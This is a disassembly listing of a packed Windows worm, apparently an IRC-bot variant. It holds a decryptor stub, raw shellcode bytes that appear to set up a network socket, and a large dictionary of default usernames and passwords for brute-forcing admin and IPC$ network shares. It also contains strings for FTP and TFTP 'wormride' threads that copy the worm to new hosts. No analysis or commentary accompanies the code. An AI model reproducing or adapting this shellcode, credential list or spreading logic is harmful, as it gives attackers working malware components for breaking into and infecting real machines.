dd 11h, 4F0052h, 54004Fh, 53005Ch, 530059h, 450054h, 5C004Dh
dd 2 dup(300030h), 0
dd 0FFFFh, 7E0h, 2 dup(0)
dd 7C0h, 0
align 10h
jmp short loc_41B84A
; ---------------------------------------------------------------------------
align 4
dd 767A1567h
; ---------------------------------------------------------------------------
jmp short loc_41B852
; ---------------------------------------------------------------------------
loc_41B84A: ; CODE XREF: .packed:0041B840�j
nop
nop
db 67h
adc eax, 8EB767Ah
loc_41B852: ; CODE XREF: .packed:0041B848�j
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 9090767Ah
nop
nop
nop
nop
nop
jmp short loc_41B8A1
; ---------------------------------------------------------------------------
db 2 dup(90h)
db 48h
dd 9088444Fh
db 90h
; ---------------------------------------------------------------------------
loc_41B8A1: ; CODE XREF: .packed:0041B897�j
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
; ---------------------------------------------------------------------------
dd 0
dd 90080000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4780800h, 600800h, 3C000010h, 8, 1, 2 dup(0)
dd 3C005400h, 2005408h, 2600h, 84D40h, 50005Ch, 500049h
dd 5C0045h, 400000h, 3000005h, 10h, 83Ch, 1, 824h, 360000h
dd 11h, 0
dd 11h, 4F0052h, 54004Fh, 53005Ch, 530059h, 450054h, 5C004Dh
dd 2 dup(300030h), 0
dd 0FFFFh, 7E0h, 2 dup(0)
dd 7C0h, 0
db 8 dup(90h)
; ---------------------------------------------------------------------------
jmp short loc_41B97E
; ---------------------------------------------------------------------------
align 4
dd 767A1567h
; ---------------------------------------------------------------------------
jmp short loc_41B986
; ---------------------------------------------------------------------------
loc_41B97E: ; CODE XREF: .packed:0041B974�j
nop
nop
db 67h
adc eax, 8EB767Ah
loc_41B986: ; CODE XREF: .packed:0041B97C�j
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
jns short near ptr word_41B9F6
add [ecx], eax
jmp short loc_41B9C6
; ---------------------------------------------------------------------------
align 10h
dd 767A1567h
db 2 dup(90h)
; ---------------------------------------------------------------------------
loc_41B9C6: ; CODE XREF: .packed:0041B9BC�j
nop
nop
nop
nop
nop
jmp short loc_41B9D5
; ---------------------------------------------------------------------------
db 2 dup(90h)
db 48h
dd 9088444Fh
db 90h
; ---------------------------------------------------------------------------
loc_41B9D5: ; CODE XREF: .packed:0041B9CB�j
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
; ---------------------------------------------------------------------------
dd 0
dd 7E0h, 4, 0
db 2 dup(0)
word_41B9F6 dw 0 ; CODE XREF: .packed:0041B9B8�j
dd 0D0EC8166h, 7, 129F74h, 0
dd 127D78h, 0
; ---------------------------------------------------------------------------
pusha
jmp short loc_41BA16
; =============== S U B R O U T I N E =======================================
sub_41BA13 proc near ; CODE XREF: .packed:loc_41BA16�p
pop ebx
push ebx
retn
sub_41BA13 endp
; ---------------------------------------------------------------------------
loc_41BA16: ; CODE XREF: .packed:0041BA11�j
call sub_41BA13
xor eax, eax
add al, 34h
add eax, ebx
push eax
pop ebx
loc_41BA23: ; CODE XREF: .packed:0041BA4C�j
xor edx, edx
add dl, [eax]
inc eax
add dh, [eax]
inc eax
push eax
xor eax, eax
add al, 41h
sub dl, al
sub dh, al
shl dl, 4
shr dx, 4
xor eax, eax
xor dh, dh
add al, [ebx]
sub [ebx], al
add [ebx], dx
inc ebx
pop eax
xor ecx, ecx
add cl, [eax]
loopne loc_41BA23
popa
add [ebx+31h], al
mov ebp, 7FC77h
add [ecx], al
inc ebx
loc_41BA5A: ; CODE XREF: .packed:0041BA5C�j
xor eax, eax
ja short loc_41BA5A
pop es
; ---------------------------------------------------------------------------
db 0
dd 4F020100h, 7E7655Bh, 0
dd 195h, 30B0005h, 10h, 48h, 1, 16D016D0h, 0
dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dd 3000005h, 10h, 18h, 1, 3 dup(0)
; ---------------------------------------------------------------------------
mov al, 1
push edx
xchg eax, edi
retf 0D059h
; ---------------------------------------------------------------------------
db 11h
dd 0A000D5A8h, 51800DC9h, 0
dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
byte_41BB00 db 90h ; DATA XREF: sub_410F60+35�r
; sub_410F60+73�r ...
dword_41BB01 dd 0 db 9Eh, 2 dup(0)
dd 0F50000h, 0F8000000h, 0
dd 0F9h, 0FC00h, 1270000h, 2F000000h, 1, 137h, 13F00h
dd 1400000h, 41000000h, 4, 842h, 24300h, 40450000h, 46000000h
dd 10h, 2047h, 14800h, 4490000h, 4A000000h, 8, 24Bh, 404D00h
dd 104E0000h, 4F000000h, 20h, 198h, 19F00h, 5910000h, 92000000h
dd 9, 393h, 419500h, 11960000h, 97000000h, 21h, 999h, 0
dd offset aAdministrator ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aAdm ; "adm"
dd offset aComputer ; "computer"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aSystem ; "system"
dd offset aServer_0 ; "server"
dd offset aRoot ; "root"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser ; "user"
dd offset aOemuser ; "oemuser"
dd offset aWwwadmin ; "wwwadmin"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
; ---------------------------------------------------------------------------
clc
retn
; ---------------------------------------------------------------------------
dw 41h
; ---------------------------------------------------------------------------
adc ah, al
inc ecx
add al, dh
retn
; ---------------------------------------------------------------------------
inc ecx
add ah, ch
retn
; ---------------------------------------------------------------------------
inc ecx
add ah, ah
retn
; ---------------------------------------------------------------------------
inc ecx
add al, ah
retn
; ---------------------------------------------------------------------------
inc ecx
add al, bl
retn
; ---------------------------------------------------------------------------
inc ecx
add al, dl
retn
; ---------------------------------------------------------------------------
inc ecx
add al, cl
retn
; ---------------------------------------------------------------------------
inc ecx
add al, al
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-4FFFBE3Dh], bh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-3Ch], al
inc ecx
add [eax-5FFFBE3Dh], ch
retn
; ---------------------------------------------------------------------------
inc ecx
add [ebx+eax*8-3C73FFBFh], dl
inc ecx
add [eax-7FFFBE3Dh], cl
retn
; ---------------------------------------------------------------------------
inc ecx
add [ebx+eax*8+41h], dh
add [ebx+eax*8+41h], ch
add [ebx+eax*8+41h], ah
add [eax-3Dh], ah
inc ecx
add [ebx+eax*8+41h], bl
add [ebx+eax*8+41h], dl
add [eax-3Dh], dl
inc ecx
add [eax-3Dh], cl
inc ecx
add [eax-3Dh], al
inc ecx
add [eax], bh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], dh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], ch
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], ah
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], bl
retn
; ---------------------------------------------------------------------------
inc ecx
add [ebx+eax*8], dl
inc ecx
add [esp+eax*8+41h], dh
add [eax], cl
retn
; ---------------------------------------------------------------------------
dw 41h
dd offset aStudent ; "student"
; ---------------------------------------------------------------------------
clc
retn 41h
; ---------------------------------------------------------------------------
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
dd 0
dd offset aC_0 ; "c$"
dd offset aD ; "d$"
; ---------------------------------------------------------------------------
fadd st(2), st
inc ecx
add al, dl
retn 41h
; ---------------------------------------------------------------------------
dd offset aDShared ; "d$\\shared"
; ---------------------------------------------------------------------------
mov eax, 0AC0041C2h
retn 41h
; ---------------------------------------------------------------------------
mov al, ds:8C0041C2h
retn 41h
; ---------------------------------------------------------------------------
dd offset aCWindowsSystem ; "c$\\windows\\system32"
; ---------------------------------------------------------------------------
push 600041C2h
retn 41h
; ---------------------------------------------------------------------------
xor dl, al
inc ecx
add [eax], ch
retn 41h
; ---------------------------------------------------------------------------
dd offset aIpc ; "IPC$"
dd 0
dd offset byte_41DEC0
dd offset aAdministrator ; "administrator"
dd offset aAdministrador ; "administrador"
; ---------------------------------------------------------------------------
aam 0C4h
inc ecx
add al, cl
les eax, [ecx+0]
rol ah, 41h
add [eax-4BFFBE3Ch], bh
les eax, [ecx+0]
sbb al, 0C2h
inc ecx
add [eax], bl
retn 41h
; ---------------------------------------------------------------------------
adc al, 0C2h
inc ecx
add [eax], cl
retn 41h
; ---------------------------------------------------------------------------
cld
rol dword ptr [ecx+0], 0F4h
rol dword ptr [ecx+0], 0F0h
rol dword ptr [ecx+0], 0E4h
rol dword ptr [ecx+0], 0DCh
rol dword ptr [ecx+0], 0D8h
rol dword ptr [ecx+0], 0D4h
rol dword ptr [ecx+0], 0D0h
rol dword ptr [ecx+0], 0CCh
rol dword ptr [ecx+0], 0C8h
rol dword ptr [ecx+0], 0C0h
rol dword ptr [ecx+0], 0B8h
rol dword ptr [ecx+0], 0B0h
rol dword ptr [ecx+0], 0A8h
rol dword ptr [ecx+0], 9Ch
rol dword ptr [ecx+0], 90h
rol dword ptr [ecx+0], 84h
rol dword ptr [ecx+0], 7Ch
rol dword ptr [ecx+0], 70h
rol dword ptr [ecx+0], 68h
rol dword ptr [ecx+0], 60h
rol dword ptr [ecx+0], 50h
xchg eax, edx
inc ecx
add [eax-3Fh], bl
inc ecx
add [eax+44004198h], dl
xchg eax, edx
inc ecx
add [eax-3Fh], dl
inc ecx
add [eax-3Fh], cl
inc ecx
add [eax-3Fh], al
inc ecx
add al, dl
retn
; ---------------------------------------------------------------------------
inc ecx
add al, cl
retn
; ---------------------------------------------------------------------------
dw 41h
dd offset aDemo ; "demo"
dd offset aComputer ; "computer"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aChangeme ; "changeme"
dd offset aDefault ; "default"
dd offset aSystem ; "system"
dd offset aServer_0 ; "server"
dd offset aRoot ; "root"
dd offset aNull ; "null"
dd offset aTemp ; "temp"
dd offset aTemp123 ; "temp123"
dd offset aQwerty ; "qwerty"
dd offset aMail ; "mail"
dd offset aOutlook ; "outlook"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aSex ; "sex"
dd offset aLetmein ; "letmein"
dd offset aAccounts ; "accounts"
dd offset aAccounting ; "accounting"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser ; "user"
dd offset aOem ; "oem"
dd offset aOemuser ; "oemuser"
dd offset aOeminstall ; "oeminstall"
dd offset aWwwadmin ; "wwwadmin"
dd offset aWindows ; "windows"
dd offset aWin98 ; "win98"
dd offset aWin2k ; "win2k"
dd offset aWinxp ; "winxp"
dd offset aWinnt ; "winnt"
dd offset aWin2000 ; "win2000"
dd offset aQaz ; "qaz"
dd offset aAsd ; "asd"
dd offset aZxc ; "zxc"
dd offset aQwe ; "qwe"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
; ---------------------------------------------------------------------------
clc
retn
; ---------------------------------------------------------------------------
dw 41h
; ---------------------------------------------------------------------------
adc ah, al
inc ecx
add al, dh
retn
; ---------------------------------------------------------------------------
inc ecx
add ah, ch
retn
; ---------------------------------------------------------------------------
inc ecx
add ah, ah
retn
; ---------------------------------------------------------------------------
inc ecx
add al, ah
retn
; ---------------------------------------------------------------------------
inc ecx
add al, bl
retn
; ---------------------------------------------------------------------------
inc ecx
add al, al
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-4FFFBE3Dh], bh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-3Ch], al
inc ecx
add [eax-5FFFBE3Dh], ch
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-40h], bh
inc ecx
add [eax+eax*8+41h], ch
add [ebx+eax*8-3C73FFBFh], dl
inc ecx
add [eax-40h], ah
inc ecx
add [eax-40h], bl
inc ecx
add [eax-40h], dl
inc ecx
add [eax-40h], cl
inc ecx
add al, dh
rol byte ptr [ecx+0], 88h
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-40h], al
inc ecx
add [eax], bh
rol byte ptr [ecx+0], 30h
rol byte ptr [ecx+0], 28h
rol byte ptr [ecx+0], 80h
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax+eax*8], bl
inc ecx
add [eax+eax*8], cl
inc ecx
add [ebx+eax*8+41h], dh
add [ebx+eax*8+41h], ch
add [eax+eax*8], al
inc ecx
add al, bh
mov edi, 0BFE80041h
inc ecx
add [ebx+eax*8+41h], ah
add ah, dl
mov edi, 0BFD00041h
inc ecx
add ah, cl
mov edi, 0BFC40041h
inc ecx
add [eax-3Dh], ah
inc ecx
add [ebx+eax*8+41h], bl
add [eax-5BFFBE41h], dh
mov edi, 0C3540041h
inc ecx
add [eax-3Dh], dl
inc ecx
add [eax-3Dh], cl
inc ecx
add [eax-3Dh], al
inc ecx
add [eax], bh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], dh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-67FFBE41h], ah
mov edi, 0BF940041h
inc ecx
add [eax], ch
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], ah
retn
; ---------------------------------------------------------------------------
inc ecx
add [edi+edi*4-407BFFBFh], cl
inc ecx
add [eax], bl
retn
; ---------------------------------------------------------------------------
inc ecx
add [ebx+eax*8], dl
inc ecx
add [esp+eax*8+41h], dh
add [eax], cl
retn
; ---------------------------------------------------------------------------
dw 41h
dd offset aStudent ; "student"
; ---------------------------------------------------------------------------
clc
retn 41h
; ---------------------------------------------------------------------------
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
dd 0
aWinpass db 'winpass',0
aBlank db 'blank',0
align 4
aXp_0 db 'xp',0
align 4
aNokia db 'nokia',0
align 10h
aHp db 'hp',0
align 4
aOrainstall db 'orainstall',0
align 10h
aSqlpassoainsta db 'sqlpassoainstall',0
align 4
aDb1234 db 'db1234',0
align 4
aDb2 db 'db2',0
aDb1 db 'db1',0
aDatabasepasswo db 'databasepassword',0
align 4
aDatabasepass db 'databasepass',0
align 4
aDbpassword db 'dbpassword',0
align 4
aDbpass db 'dbpass',0
align 4
aDomainpassword db 'domainpassword',0
align 4
aDomainpass db 'domainpass',0
align 4
aHello db 'hello',0
align 10h
aHell db 'hell',0
align 4
aLove db 'love',0
align 10h
aMoney db 'money',0
align 4
aSlut db 'slut',0
align 10h
aBitch db 'bitch',0
align 4
aFuck db 'fuck',0
align 10h
aExchange db 'exchange',0
align 4
aLoginpass db 'loginpass',0
align 4
aLogin db 'login',0
align 10h
aQwe db 'qwe',0 ; DATA XREF: .packed:0041BE4C�o
aZxc db 'zxc',0 ; DATA XREF: .packed:0041BE48�o
aAsd db 'asd',0 ; DATA XREF: .packed:0041BE44�o
aQaz db 'qaz',0 ; DATA XREF: .packed:0041BE40�o
aWin2000 db 'win2000',0 ; DATA XREF: .packed:0041BE3C�o
aWinnt db 'winnt',0 ; DATA XREF: .packed:0041BE38�o
align 10h
aWinxp db 'winxp',0 ; DATA XREF: .packed:0041BE34�o
align 4
aWin2k db 'win2k',0 ; DATA XREF: .packed:0041BE30�o
align 10h
aWin98 db 'win98',0 ; DATA XREF: .packed:0041BE2C�o
align 4
aWindows db 'windows',0 ; DATA XREF: .packed:0041BE28�o
aOeminstall db 'oeminstall',0 ; DATA XREF: .packed:0041BE20�o
align 4
aOem db 'oem',0 ; DATA XREF: .packed:0041BE18�o
aAccounting db 'accounting',0 ; DATA XREF: .packed:0041BE08�o
align 4
aAccounts db 'accounts',0 ; DATA XREF: .packed:0041BE04�o
align 4
aLetmein db 'letmein',0 ; DATA XREF: .packed:0041BE00�o
aSex db 'sex',0 ; DATA XREF: .packed:0041BDFC�o
aOutlook db 'outlook',0 ; DATA XREF: .packed:0041BDEC�o
aMail db 'mail',0 ; DATA XREF: .packed:0041BDE8�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: .packed:0041BDE4�o
align 4
aTemp123 db 'temp123',0 ; DATA XREF: .packed:0041BDE0�o
aTemp db 'temp',0 ; DATA XREF: .packed:0041BDDC�o
align 4
aNull db 'null',0 ; DATA XREF: .packed:0041BDD8�o
align 4
aDefault db 'default',0 ; DATA XREF: .packed:0041BDC8�o
aChangeme db 'changeme',0 ; DATA XREF: .packed:0041BDC4�o
align 4
aDemo db 'demo',0 ; DATA XREF: .packed:0041BDB4�o
align 10h
aTest db 'test',0
align 4
a2005 db '2005',0
align 10h
a2004 db '2004',0
align 4
a2001 db '2001',0
align 10h
aSecret db 'secret',0
align 4
aPayday db 'payday',0
align 10h
aDeadline db 'deadline',0
align 4
aWork db 'work',0
align 4
a1234567890 db '1234567890',0
align 10h
a123456789 db '123456789',0
align 4
a12345678 db '12345678',0
align 4
a1234567 db '1234567',0
a123456 db '123456',0
align 4
a12345 db '12345',0
align 10h
a1234 db '1234',0
align 4
a123 db '123',0
a12 db '12',0
align 10h
a1:
unicode 0, <1>,0
a007 db '007',0
aPwd db 'pwd',0
aPass db 'pass',0
align 4
aPass1234 db 'pass1234',0
align 10h
aDba db 'dba',0
aPasswd db 'passwd',0
align 4
aPassword db 'password',0 ; DATA XREF: .packed:0041D800�o
align 4
aPassword1 db 'password1',0
align 4
aAbc db 'abc',0
aAb db 'ab',0
align 4
aA_1:
unicode 0, <a>,0
aIpc db 'IPC$',0 ; DATA XREF: .packed:0041BD04�o
align 4
aPrint db 'print$',0
align 10h
aCDocumentsAndS db 'C$\Documents and Settings\All Users\Documents\$',0
aAdmin_0 db 'admin$',0
align 4
aAdminSystem32 db 'Admin$\system32',0
aCWindowsSystem db 'c$\windows\system32',0 ; DATA XREF: .packed:0041BCF0�o
aCWinntSystem32 db 'c$\winnt\system32',0
align 10h
aCWindows db 'c$\windows',0
align 4
aCWinnt db 'c$\winnt',0
align 4
aEShared db 'e$\shared',0
align 4
aDShared db 'd$\shared',0 ; DATA XREF: .packed:0041BCDC�o
align 10h
aCShared db 'c$\shared',0
align 4
aE_0 db 'e$',0
align 10h
aD db 'd$',0 ; DATA XREF: .packed:0041BCD0�o
align 4
aC_0 db 'c$',0 ; DATA XREF: .packed:0041BCCC�o
align 4
aStaff db 'staff',0 ; DATA XREF: .packed:0041BCC4�o
; .packed:0041BF7C�o
align 10h
aTeacher db 'teacher',0 ; DATA XREF: .packed:0041BCC0�o
; .packed:0041BF78�o
aOwner db 'owner',0
align 10h
aStudent db 'student',0 ; DATA XREF: .packed:0041BCB8�o
; .packed:0041BF70�o
aIntranet db 'intranet',0
align 4
aLan_0 db 'lan',0
aMain db 'main',0 ; DATA XREF: .packed:00416ACA�o
; .packed:00416AEC�o
align 10h
aOffice db 'office',0
align 4
aControl db 'control',0
aSiemens db 'siemens',0
aCompaq db 'compaq',0
align 10h
aDell db 'dell',0
align 4
aCisco db 'cisco',0
align 10h
aIbm db 'ibm',0
aOracle db 'oracle',0
align 4
aSql db 'sql',0
aSa db 'sa',0
align 4
aData db 'data',0
align 4
aAccess db 'access',0
align 4
aDatabase db 'database',0
align 10h
aDomain db 'domain',0
align 4
aGod db 'god',0
aBackup db 'backup',0
align 4
aTechnical db 'technical',0
align 10h
aMary db 'mary',0
align 4
aKatie db 'katie',0
align 10h
aKate db 'kate',0
align 4
aGeorge db 'george',0
align 10h
aEric db 'eric',0
align 4
aNone db 'none',0
align 10h
aGuest db 'guest',0
align 4
aChris db 'chris',0
align 10h
aIan db 'ian',0
aNeil db 'neil',0
align 4
aLee db 'lee',0
aBrian db 'brian',0
align 4
aSusan db 'susan',0
align 10h
aSue db 'sue',0 ; DATA XREF: .packed:0041BC24�o
; .packed:0041BE78�o
aSam db 'sam',0 ; DATA XREF: .packed:0041BC20�o
; .packed:0041BE74�o
aLuke db 'luke',0 ; DATA XREF: .packed:0041BC1C�o
; .packed:0041BE70�o
align 10h
aPeter db 'peter',0 ; DATA XREF: .packed:0041BC18�o
; .packed:0041BE6C�o
align 4
aJohn db 'john',0 ; DATA XREF: .packed:0041BC14�o
; .packed:0041BE68�o
align 10h
aMike db 'mike',0 ; DATA XREF: .packed:0041BC10�o
; .packed:0041BE64�o
align 4
aBill db 'bill',0 ; DATA XREF: .packed:0041BC0C�o
; .packed:0041BE60�o
align 10h
aFred db 'fred',0 ; DATA XREF: .packed:0041BC08�o
; .packed:0041BE5C�o
align 4
aJoe db 'joe',0 ; DATA XREF: .packed:0041BC04�o
; .packed:0041BE58�o
aJen db 'jen',0 ; DATA XREF: .packed:0041BC00�o
; .packed:0041BE54�o
aBob db 'bob',0 ; DATA XREF: .packed:0041BBFC�o
; .packed:0041BE50�o
aWwwadmin db 'wwwadmin',0 ; DATA XREF: .packed:0041BBF8�o
; .packed:0041BE24�o
align 10h
aOemuser db 'oemuser',0 ; DATA XREF: .packed:0041BBF4�o
; .packed:0041BE1C�o
aUser db 'user',0 ; DATA XREF: .packed:0041BBF0�o
; .packed:0041BE14�o
align 10h
aHomeuser db 'homeuser',0 ; DATA XREF: .packed:0041BBEC�o
; .packed:0041BE10�o
align 4
aHome db 'home',0 ; DATA XREF: .packed:0041BBE8�o
; .packed:0041BE0C�o
align 4
aInternet db 'internet',0 ; DATA XREF: .packed:0041BBE4�o
; .packed:0041BDF8�o
align 10h
aWww db 'www',0 ; DATA XREF: .packed:0041BBE0�o
; .packed:0041BDF4�o
aWeb db 'web',0 ; DATA XREF: .packed:0041BBDC�o
; .packed:0041BDF0�o
aRoot db 'root',0 ; DATA XREF: .packed:0041BBD8�o
; .packed:0041BDD4�o
align 10h
aServer_0 db 'server',0 ; DATA XREF: .packed:0041BBD4�o
; .packed:0041BDD0�o
align 4
aLinux db 'linux',0 ; DATA XREF: .packed:0041BBCC�o
; .packed:0041BDC0�o
align 10h
aUnix db 'unix',0 ; DATA XREF: .packed:0041BBC8�o
; .packed:0041BDBC�o
align 4
aComputer db 'computer',0 ; DATA XREF: .packed:0041BBC4�o
; .packed:0041BDB8�o
align 4
aAdm db 'adm',0 ; DATA XREF: .packed:0041BBC0�o
aAdmin db 'admin',0 ; DATA XREF: .packed:0041BBBC�o
align 10h
aAdmins db 'admins',0 ; DATA XREF: .packed:0041BBB8�o
align 4
aAdministrat db 'administrat',0 ; DATA XREF: .packed:0041BBB4�o
aAdministrateur db 'administrateur',0 ; DATA XREF: .packed:0041BBB0�o
align 4
aAdministrador db 'administrador',0 ; DATA XREF: .packed:0041BBAC�o
; .packed:0041BD14�o
align 4
aAdministrator db 'administrator',0 ; DATA XREF: .packed:0041BBA8�o
; .packed:0041BD10�o
align 4
a231 db '231 -',0Dh,0Ah,0 ; DATA XREF: sub_41113B:loc_4119BA�o
a221 db '221 -',0Dh,0Ah,0 ; DATA XREF: sub_41113B+843�o
dword_41C514 dd 130CD8h align 10h
unk_41C520 db 2Dh ; - ; DATA XREF: sub_41113B+80D�o
db 3, 30h, 34h
db 2
db 25h, 73h, 3
db 2
aU_TransferToSC db '- %u. Transfer to %s complete.',0
aFtp_0 db 'ftp',0 ; DATA XREF: sub_41113B+808�o
dword_41C54C dd 13EBA0h dd 2 dup(0)
dword_41C558 dd 20363232h, 0A0D2Dh ; sub_41113B+7AA�o
aX32000Fh1024Ja db '-x 3 2000 fh 1024 Jan 1 0:00 .',0Dh,0Ah ; DATA XREF: sub_41113B+6AF�o
db 'drwxr-xr-x 3 2000 fh 1024 Jan 1 0:00 ..',0Dh,0Ah
db '-rwxr-xr-x 3 2000 fh %u Jan 1 0:00 %s',0Dh,0Ah,0
align 4
a150 db '150 -',0Dh,0Ah,0 ; DATA XREF: sub_41113B+5C7�o
; sub_41113B+751�o
dword_41C5DC dd 110858h dd 2 dup(0)
dword_41C5E8 dd 20333132h, 0A0D7525h, 0dword_41C5F4 dd 0BF180h align 10h
aUUUUUU db '%u,%u,%u,%u,%u,%u',0 ; DATA XREF: sub_41113B+427�o
align 4
dword_41C614 dd 13C158h align 10h
dword_41C620 dd 20353234h, 0A0D2Dhdword_41C628 dd 13C3F8h dd 2 dup(0)
dword_41C634 dd 20303032h, 0A0D2Dh ; sub_41113B+4A6�o
dword_41C63C dd 11C1C0h dd 2 dup(0)
dword_41C648 dd 20373532h, 20222F22h, 0A0D2Dhdword_41C654 dd 26218h dd 0
dword_41C65C dd 20313132h, 0A0D2Dhdword_41C664 dd 151818h align 10h
dword_41C670 dd 20353132h, 0A0D2Dhdword_41C678 dd 0BF858h dd 2 dup(0)
dword_41C684 dd 20303332h, 0A0D2Dhdword_41C68C dd 13BF80h dd 2 dup(0)
dword_41C698 dd 20313333h, 0A0D2Dhdword_41C6A0 dd 11A4E0h dd 2 dup(0)
dword_41C6AC dd 0A0D20h ; sub_41113B+115�o ...
dword_41C6B0 dd 20303232h, 0A0D2Dhdword_41C6B8 dd 303332h dword_41C6BC dd 53534150h, 0A0D3120h, 0dword_41C6C8 dd 313333h dword_41C6CC dd 52455355h, 0A0D3120h, 0dword_41C6D8 dd 303232h unk_41C6DC db 2Dh ; - ; DATA XREF: sub_411BBC+115�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aRunningFtpWorm db '- Running FTP wormride thread',0
align 4
a127_0_0_1 db '127.0.0.1',0 ; DATA XREF: sub_411BBC+6E�o
align 10h
aFtpWormrideThr db 'FTP wormride thread',0 ; DATA XREF: sub_411D68+36�o
dword_41C724 dd 4000500h, 7868746Bh, 0unk_41C730 db 2Dh ; - ; DATA XREF: sub_411DC5+5BD�o
db 3, 30h, 34h
db 2
db 25h, 73h, 3
db 2
aU_TftpTransfer db '- %u. tftp transfer to %s complete.',0
align 10h
aWormride db 'wormride',0 ; DATA XREF: sub_411DC5+5B8�o
align 4
dword_41C76C dd 1000500h, 656C6946h, 746F4E20h, 756F4620h, 646Eh
; DATA XREF: sub_411DC5+367�o
aOctet db 'octet',0 ; DATA XREF: sub_411DC5+333�o
; sub_411DC5+345�o
align 4
unk_41C788 db 2Dh ; - ; DATA XREF: sub_411DC5+144�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aRunningTftpWor db '- Running TFTP wormride thread',0
aTftpWormrideTh db 'TFTP wormride thread',0 ; DATA XREF: sub_4123F6+2B�o
align 4
loc_41C7C8: ; DATA XREF: sub_4125DF+50�o
jmp short loc_41C7DF
; ---------------------------------------------------------------------------
loc_41C7CA: ; CODE XREF: .packed:loc_41C7DF�p
mov ecx, 0
xor ecx, 0
pop esi
loc_41C7D6: ; CODE XREF: .packed:0041C7DB�j
xor byte ptr [ecx+esi-1], 0
loop loc_41C7D6
jmp short near ptr dword_41C7E4
; ---------------------------------------------------------------------------
loc_41C7DF: ; CODE XREF: .packed:loc_41C7C8�j
call loc_41C7CA
; ---------------------------------------------------------------------------
dword_41C7E4 dd 0 dword_41C7E8 dd 8B64DB33h, 408B3043h, 1C708B0Ch, 8788BADh, 45E8h, 8B565300h
; DATA XREF: sub_4124A0+CB�o
dd 5C8B3C5Fh, 0DF03783Bh, 205B8B53h, 8353DF03h, 338B04C3h
dd 0C933F703h, 0C1C832ACh, 0C08405C1h, 0CA2BF675h, 2B58E975h
dd 5EEBD1D8h, 3245E03h, 0B8B66DFh, 31C5E8Bh, 8B048BDFh
dd 5B5EC703h, 685EE0FFh, 3233h, 32737768h, 92BA545Fh, 0FF84046Eh
dd 81F88BD6h, 200ECh, 53EC8B00h, 26A016Ah, 835383BAh, 53D6FF00h
dd 6853h, 2680000h, 8B000000h, 6AD88BD4h, 0BA535210h, 5A603063h
dd 0B450D6FFh, 53555002h, 605800BAh, 0BFD6FFE2h, 0
; ---------------------------------------------------------------------------
jmp ebp
; ---------------------------------------------------------------------------
align 4
dword_41C89C dd 8B64DB33h, 408B3043h, 1C708B0Ch, 8788BADh, 45E8h, 8B565300h
; DATA XREF: sub_4124A0+8C�o
dd 5C8B3C5Fh, 0DF03783Bh, 205B8B53h, 8353DF03h, 338B04C3h
dd 0C933F703h, 0C1C832ACh, 0C08405C1h, 0CA2BF675h, 2B58E975h
dd 5EEBD1D8h, 3245E03h, 0B8B66DFh, 31C5E8Bh, 8B048BDFh
dd 5B5EC703h, 685EE0FFh, 3233h, 32737768h, 92BA545Fh, 0FF84046Eh
dd 81F88BD6h, 200ECh, 53EC8B00h, 26A016Ah, 835383BAh, 53D6FF00h
dd 2685353h, 8B000000h, 6AD88BD4h, 0BA535210h, 0C2A69000h
dd 5040D6FFh, 3B7ABA53h, 0D6FFA173h, 0BA535050h, 69D310h
